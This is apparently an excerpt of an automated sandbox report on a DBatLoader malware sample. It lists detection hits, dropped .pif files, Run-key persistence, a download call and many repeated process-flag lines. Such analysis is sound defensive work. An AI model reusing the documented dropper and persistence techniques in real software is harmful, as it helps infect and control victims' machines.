                Source: Binary string: easinvoker.pdb source: nft438A5fN.exe, nft438A5fN.exe, 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1655641681.000000003960E000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1613117060.0000000002346000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1655641681.00000000395DE000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1477595760.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1655641681.0000000039626000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: cmd.pdbUGP source: esentutl.exe, 00000005.00000003.1585864121.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, alpha.pif, 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 0000000A.00000002.1599731448.0000000000041000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 0000000F.00000002.1715376572.0000000000041000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 00000018.00000000.1733704656.0000000000041000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 0000001B.00000002.1750139322.0000000000041000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 0000001C.00000000.1755754278.0000000000041000.00000020.00000001.01000000.00000006.sdmp, alpha.pif.5.dr
                Source: Binary string: ping.pdbGCTL source: esentutl.exe, 00000006.00000003.1589575934.0000000005850000.00000004.00001000.00020000.00000000.sdmp, xpha.pif, 00000010.00000002.1712179050.00000000000F1000.00000020.00000001.01000000.00000009.sdmp, xpha.pif.6.dr
                Source: Binary string: easinvoker.pdbH source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: easinvoker.pdbGCTL source: nft438A5fN.exe, 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1592952655.000000003A53F000.00000004.00000020.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1655641681.000000003960E000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1613117060.0000000002346000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1592952655.000000003A510000.00000004.00000020.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1655641681.00000000395DE000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1477595760.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1655641681.0000000039626000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: cmd.pdb source: alpha.pif, alpha.pif, 0000000F.00000002.1715376572.0000000000041000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 00000018.00000000.1733704656.0000000000041000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 0000001B.00000002.1750139322.0000000000041000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 0000001C.00000000.1755754278.0000000000041000.00000020.00000001.01000000.00000006.sdmp, alpha.pif.5.dr
                Source: Binary string: ping.pdb source: esentutl.exe, 00000006.00000003.1589575934.0000000005850000.00000004.00001000.00020000.00000000.sdmp, xpha.pif, xpha.pif, 00000010.00000002.1712179050.00000000000F1000.00000020.00000001.01000000.00000009.sdmp, xpha.pif.6.dr

                Data Obfuscation

                barindex
                Yara detected DBatLoader
                Source: Yara matchFile source: 0.2.nft438A5fN.exe.23465a8.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.nft438A5fN.exe.2c90000.3.unpack, type: UNPACKEDPE
                Source: alpha.pif.5.drStatic PE information: 0xF8D87E17 [Thu Apr 20 00:53:43 2102 UTC]
                Source: C:\Users\user\Desktop\nft438A5fN.exeCode function: 0_2_02CA894C LoadLibraryW,GetProcAddress,FreeLibrary,0_2_02CA894C
                Source: alpha.pif.5.drStatic PE information: section name: .didat
                Source: C:\Users\user\Desktop\nft438A5fN.exeCode function: 0_2_02C963AE push 02C9640Bh; ret 0_2_02C96403
                Source: C:\Users\user\Desktop\nft438A5fN.exeCode function: 0_2_02C963B0 push 02C9640Bh; ret 0_2_02C96403
                Source: C:\Users\user\Desktop\nft438A5fN.exeCode function: 0_2_02C9C349 push 8B02C9C1h; ret 0_2_02C9C34E
                Source: C:\Users\user\Desktop\nft438A5fN.exeCode function: 0_2_02CBC378 push 02CBC56Eh; ret 0_2_02CBC566
                Source: C:\Users\user\Desktop\nft438A5fN.exeCode function: 0_2_02C96782 push 02C967C6h; ret 0_2_02C967BE
                Source: C:\Users\user\Desktop\nft438A5fN.exeCode function: 0_2_02C96784 push 02C967C6h; ret 0_2_02C967BE
                Source: C:\Users\user\Desktop\nft438A5fN.exeCode function: 0_2_02D6E716 push ecx; ret 0_2_02D6E729
                Source: C:\Users\user\Desktop\nft438A5fN.exeCode function: 0_2_02D4C446 push ecx; ret 0_2_02D4C459
                Source: C:\Users\user\Desktop\nft438A5fN.exeCode function: 0_2_02C9C56C push ecx; mov dword ptr [esp], edx0_2_02C9C571
                Source: C:\Users\user\Desktop\nft438A5fN.exeCode function: 0_2_02CBC570 push 02CBC56Eh; ret 0_2_02CBC566
                Source: C:\Users\user\Desktop\nft438A5fN.exeCode function: 0_2_02CA8AD8 push 02CA8B10h; ret 0_2_02CA8B08
                Source: C:\Users\user\Desktop\nft438A5fN.exeCode function: 0_2_02CAAADF push 02CAAB18h; ret 0_2_02CAAB10
                Source: C:\Users\user\Desktop\nft438A5fN.exeCode function: 0_2_02CAAAE0 push 02CAAB18h; ret 0_2_02CAAB10
                Source: C:\Users\user\Desktop\nft438A5fN.exeCode function: 0_2_02D04A50 push eax; ret 0_2_02D04B20
                Source: C:\Users\user\Desktop\nft438A5fN.exeCode function: 0_2_02C9CBEC push 02C9CD72h; ret 0_2_02C9CD6A
                Source: C:\Users\user\Desktop\nft438A5fN.exeCode function: 0_2_02C9CBE3 push 02C9CD72h; ret 0_2_02C9CD6A
                Source: C:\Users\user\Desktop\nft438A5fN.exeCode function: 0_2_02CA886C push 02CA88AEh; ret 0_2_02CA88A6
                Source: C:\Users\user\Desktop\nft438A5fN.exeCode function: 0_2_02CA6948 push 02CA69F3h; ret 0_2_02CA69EB
                Source: C:\Users\user\Desktop\nft438A5fN.exeCode function: 0_2_02CA6946 push 02CA69F3h; ret 0_2_02CA69EB
                Source: C:\Users\user\Desktop\nft438A5fN.exeCode function: 0_2_02CA2F60 push 02CA2FD6h; ret 0_2_02CA2FCE
                Source: C:\Users\user\Desktop\nft438A5fN.exeCode function: 0_2_02CBD2FC push 02CBD367h; ret 0_2_02CBD35F
                Source: C:\Users\user\Desktop\nft438A5fN.exeCode function: 0_2_02C9332C push eax; ret 0_2_02C93368
                Source: C:\Users\user\Desktop\nft438A5fN.exeCode function: 0_2_02CBD0AC push 02CBD125h; ret 0_2_02CBD11D
                Source: C:\Users\user\Desktop\nft438A5fN.exeCode function: 0_2_02CA306B push 02CA30B9h; ret 0_2_02CA30B1
                Source: C:\Users\user\Desktop\nft438A5fN.exeCode function: 0_2_02CA306C push 02CA30B9h; ret 0_2_02CA30B1
                Source: C:\Users\user\Desktop\nft438A5fN.exeCode function: 0_2_02D6F038 push eax; ret 0_2_02D6F056
                Source: C:\Users\user\Desktop\nft438A5fN.exeCode function: 0_2_02CBD1F8 push 02CBD288h; ret 0_2_02CBD280
                Source: C:\Users\user\Desktop\nft438A5fN.exeCode function: 0_2_02CBD144 push 02CBD1ECh; ret 0_2_02CBD1E4
                Source: C:\Users\user\Desktop\nft438A5fN.exeCode function: 0_2_02CAF108 push ecx; mov dword ptr [esp], edx0_2_02CAF10D
                Source: C:\Users\user\Desktop\nft438A5fN.exeCode function: 0_2_02C9D5A0 push 02C9D5CCh; ret 0_2_02C9D5C4
                Source: C:\Users\user\Desktop\nft438A5fN.exeCode function: 0_2_02CA790C push 02CA7989h; ret 0_2_02CA7981

                Persistence and Installation Behavior

                barindex
                Drops PE files with a suspicious file extension
                Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
                Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\xpha.pifJump to dropped file
                Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\Libraries\Wuqtggvo.PIFJump to dropped file
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_03206EEB ShellExecuteW,URLDownloadToFileW,11_2_03206EEB
                Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
                Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\xpha.pifJump to dropped file
                Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\Libraries\Wuqtggvo.PIFJump to dropped file
                Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
                Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\xpha.pifJump to dropped file

                Boot Survival

                barindex
                Drops PE files to the user root directory
                Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
                Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\xpha.pifJump to dropped file
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_0321AB9E OpenSCManagerW,OpenServiceW,CloseServiceHandle,ControlService,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,11_2_0321AB9E
                Source: C:\Users\user\Desktop\nft438A5fN.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WuqtggvoJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WuqtggvoJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeCode function: 0_2_02CAAB1C GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_02CAAB1C
                Source: C:\Users\user\Desktop\nft438A5fN.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
